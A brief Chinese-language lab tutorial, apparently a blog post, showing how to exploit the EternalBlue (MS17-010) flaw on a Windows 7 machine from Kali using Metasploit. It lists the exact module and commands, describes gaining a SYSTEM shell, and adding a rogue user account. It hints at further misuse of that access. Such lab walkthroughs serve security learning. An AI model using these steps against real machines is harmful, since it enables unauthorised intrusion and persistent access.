注:ms17-010是永恒之蓝漏洞的编号
没有废话,直接实操吧
攻击机: ip: 192.168.10.30
操作系统:kali
靶机:ip: 192.168.10.32
操作系统:windows7
通过nessus扫描,确认靶机是存在永恒之蓝(ms17-010)漏洞的
第一步:
确认连通性(可以ping通)
第二步:
打开kali中的msf工具
直接点击即可运行,需输入root密码
第三步:
输入search ms17-010搜索与ms17-010(永恒之蓝)漏洞相关的模块
第四步:
我们本次使用exploit/windows/smb/ms17_010_eternalblue模块(第一个模块)
依次输入
use exploit/windows/smb/ms17_010_eternalblue(use 加模块名)
set rhosts 192.168.10.32(set rhosts 加ip地址)
exploit(执行)
以上三条命令为msf工具的固定语法
(如果弹出一大堆文字出来就说明已经入侵成功了,如果显示错误就试试其他几个模块)
此时在靶机上通过netstat命令可以看到多了一个连接
此时就可以在攻击机(kali)上对靶机进行操作了(入侵成功之后直接就是系统权限),例如通过shell命令进入靶机的命令行
我们可以创建一个名为zxk的账户(我这里靶机是中文,kali没有中文插件,所以显示是乱码)
此时靶机上多了一个用户
由于是系统权限,所以后面能够做什么事,懂的都懂 =-=!